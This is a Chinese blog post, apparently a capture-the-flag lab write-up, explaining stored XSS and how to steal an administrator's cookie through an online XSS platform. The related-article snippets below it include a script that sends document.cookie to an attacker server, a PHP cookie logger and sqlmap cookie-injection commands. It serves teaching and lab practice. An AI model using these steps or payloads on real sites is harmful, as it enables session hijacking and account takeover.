xss获取cookie(封神台第三章)

已于 2024-05-19 20:10:19 修改
阅读量479 收藏
点赞数
文章标签: xss
于 2023-09-20 17:13:32 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_66013948/article/details/133045708
版权 
2abda25a-cfa1-4864-a4a3-57dd31916ca1
var code = "2abda25a-cfa1-4864-a4a3-57dd31916ca1"

        之前说过cookie就是在访问网站的时候第一个传递的数据,这其实是不全面的,cookie真正的指的其实就是某些网站为了辨别用户身份,进行session追踪而存储在用户本地终端上的数据,一般经过加密。

        xss是跨站脚本攻击,是代码注入的一种,它允许恶意用户将代码注入网页,当其他用户在浏览网页时就会受到影响。也可以说xss是将用户输入的数据当作了html语句放到了页面上。

        xss攻击分为大地分为两类,反射型和存储型:

        1.反射型就是提交的数据成功地实现了xss,但是仅仅是对本次访问产生了影响,是非持久型的攻击。

        2.存储型就是提交的数据成功的实现了xss,存入了数据库/文件,别人访问这个页面的时候就会自动触发。

        那么应该怎样进行xss攻击获得目标网站管理员cookie呢?

        首先应该看一下将能够输入<h1>内容<h1>的地方全部写上,然后观察后面的反馈,之后寻找xss注入点,可以按F12审查元素,寻找可执行的xss语句。

       之后,在xss.pt网站中注册一个账号,生成一个xss代码用keep......的方式(非keep时效短),然后将代码放在有xss漏洞的地方,上传表单。等一段时间之后,就可以获取管理员的cookie了(如果管理员查看了你的表单)。那么,就可以在之前的在线工具中看到管理员的cookie了,之后就可以无密码的情况下完成管理员登录了。当然,本题的flag的可以在cookie中找到。

晓幂
关注
xss获取cookie的方法
计算机毕业论文源码,学生个人网页制作html源码。贴近用户做网络推广和互联网优化。
12-27 1931
xss获取cookie简单步骤如下: 1、在存在漏洞的论坛中发日志。 2、然后以管理远登陆,进入后页面会跳转,此时cookie就发送到你的服务器下的code.txt文件中了。 3、这是没有账户前的登陆界面。 4、打开firefox的Tamper Data插件,点击Start Tamper开始抓取信息,刷新登陆界面,然后会跳出对话框,点击Tamper按钮,在途中的cookie一栏中替换掉你抓取到的cookie,单击确定发送请求数据,xss获取cookie 5、替换cookie后不用输用户名密码
利用 XSS 获取 Cookie 利用DOM XSS
weixin_71416901的博客
06-21 1257
XSS
神台靶场,为了小芳,冲之——cookie注入
Wubuqing的博客
10-30 454
第二个靶场 打开网站 找一下注入点 一般在新闻这种里面点开看看 先判断是否存在注入 有waf 尝试了很多方法绕过都没成功,/and/,aandnd,AnD等一系列都没绕过去,乌鸡鲅鱼 删掉id=169 发现 然后判断cookie注入 在搜索框输入 Javascript:alert(document.cookie=”id=”+escape(‘169’)); 然后弹窗了(其中 “id=” 取决URL中的id= escape中的数值也是URL中id=的值)返回刚刚的页面,把ID删除后一样能正常显示。说明服务器能
XSS平台获取cookie
qq_41048303的博客
02-19 3689
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
XSS平台与cookie获取
永远是少年
11-21 1235
今天继续给大家介绍渗透测试相关知识,本文主要内容是XSS平台与cookie获取。 一、XSS攻击目的 二、XSS平台 三、XSS攻击获取cookie简介
XSS平台的简单搭建和获取cookie
m0_65096687的博客
10-09 2566
XSS平台可以辅助安全测试人员对XSS相关的漏洞危害进行深入学习,了解XSS的危害重视XSS的危害,如果要说XSS可以做哪些事情,XSS可以做js能够做的所有事情。包括但不限于:窃取Cookie、后台增删改文章、钓鱼、利用XSS漏洞进行传播、修改网页代码、网站重定向、获取用户信息(如浏览器信息,IP地址等)等。选择蓝莲花XSS平台的原因很简单,因为网络上大多数XSS平台都是需要注册啊,绑定什么的。2.把下载好的蓝莲花解压在PHPstudy的WWW目录下,这里为我更名为XSS。只需要修改登录密码进行提交。
神台——Cookie伪造目标权限(存储XSS
Zichel77的博客
07-04 1074
点击传送门看到的是一个留言板 我们首先要判断是否存在XSS 于是输入一串JS代码 看是否会弹出一个内容为'zkaq'的弹窗 出现了,说明存在XSS漏洞 关于XSS漏洞的科普如下 跨站脚本攻击是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 xss漏洞通常是通过php的输出函数将javascript代码输出到html页面中,通过用户本地浏览器执行的,所以xss漏洞关键就是寻找参数未过滤的输
XSS获取COOKIE
04-20
XSS获取COOKIE
XSS获取cookie和利用方式 (ASP版).txt
12-22
XSS获取cookie和利用方式简单方法
xss获取cookie登陆
weixin_51356351的博客
11-17 1093
实验环境: phpstudy DVWA靶场 实验步骤 1、在phpstudy的www目录下创建一个名为1.php的文件,文件内容如下: <?php $file = fopen("1.txt","a"); if($_GET['cookie']){ $cookie = $_GET['cookie']; fputs ($file,"$cookie\n"); } ?> 2、进入DVWA靶机,级别调成low,选择(XSS)stored 3、F12打开查看器,将值改的大一点 4、将插入留言板中
神台cookie伪造目标权限
00勇士王子的博客
11-17 718
题目 解题过程 访问网站,是一个留言板 先用普通的xss测试一下 成功弹窗,说明地处存在xss漏洞 选择一个在线的xss平台,创建项目后输入平台的xss代码(我随便在网上找了一个xss平台如下:https://xss8.cc) 原理就是当管理员查看留言页面时触发xss,将管理员cookie发送到该平台上面,从而实现利用管理员cookie进行伪造目标权限 因为xss bot 每10秒访问一次页面,相当于管理员每10秒看一次留言,触发一次xss代码,所以在10秒后,xss平台接收到了目标的coo
神台】SQL注入绕过WAF练习(cookie注入)
00勇士王子的博客
11-17 3494
题目 解题过程 进入网站 随便点击一个新闻,出现参数id,进行单引号测试: 提示参数不能包含非法字符,应该是黑名单过滤 猜测是cookie注入 burp抓包,将参数放入cookie中,页面正常访问: 单引号测试,页面报错,没有警告弹出 sqlmap跑出payload python sqlmap.py -u “http://kypt8004.ia.aqlab.cn/shownews.asp?” --cookie=“id=171” --level 2 跑出表 python sqlmap.py
第五章 城会玩?抱歉我是一名程序员 存储xss偷取更高权限的管理员登陆cookie
Q893448322的博客
12-27 521
** 目录 第一章 黑客学习路线梳理 第二章 让你的kali变得更好用 第三章 别惹程序员0.0~简单的web渗透拿到用户名密码 第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台 ** 继上一篇文章(第四章 抛弃我,我会战斗不息~跳过防火墙,进入后台),我们已经进入了美人所创建的网站后台,把她网页要展示的信息好好“调整”了一下,但是还是意犹未尽,毕竟现在的小小惩罚还没有让她意识到问题的严重性嘛,所以雁过留声,想着还要在她的网站植入一个木马,借此好好调戏一番抛弃自己的美人~ 但是发现我们进一步的攻击却受到了
xss平台获取管理员cookie
最新发布
weixin_69065643的博客
07-23 220
登录管理员后台(用户:admin 密码: 123456)复制第二条 粘到pikachu靶场xss盲打关卡。点击创建的项目,查看配置代码。我们可以看到有主机上线。可以看见cookie
xss利用之获取管理员cookie
weixin_48421613的博客
08-27 3307
xss利用之获取后台管理员cookie 首先需要声明的是,我们这次讲解的小案例是开源的一个环境,并不是盲打xss,也就是说我们是可以在自己的服务器上搭建环境而后进行一系列的测试 现我们在靶场找到存储(持久xss注入,我们该如何通过xss获取超级管理员cookie从而登录后台呢? 通过测试,我们得知在留言板的title(标题 )处存在存储xss注入,通过后台访问可以执行script代码 - 我们通过观察,得知body(内容)内的script代码被过滤,但是title内的被执行了
简单的利用XSS获取用户cookie
shy的博客
10-25 4405
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS的键盘记录和cookie获取
Williamanddog的博客
01-26 2004
跨站脚本攻击XSS(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混 淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意JavaScript代码,当用户浏览该页 面时,嵌入Web里面的JS代码会被执行,从而达到恶意攻击用户的目的。XSS攻击针对的是用户层面的 攻击。 在一个Web页面上,有一种很常见的功能是将用户输入的内容输出到页面上。但是如果这里输入的内容 。
web安全中存储XSS手动获取cookie信息
qq_63539335的博客
01-14 619
web安全中存储XSS漏洞,基础手工攻击演示
ASP版XSS获取cookie技术解析与利用
"XSS获取cookie和利用方式 (ASP版).txt 涉及到的是Web安全领域中的跨站脚本(XSS)攻击,重点是如何通过ASP(Active Server Pages)来实现XSS攻击并窃取用户的cookie信息。" 在Web应用程序中,Cookie是一种常用的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值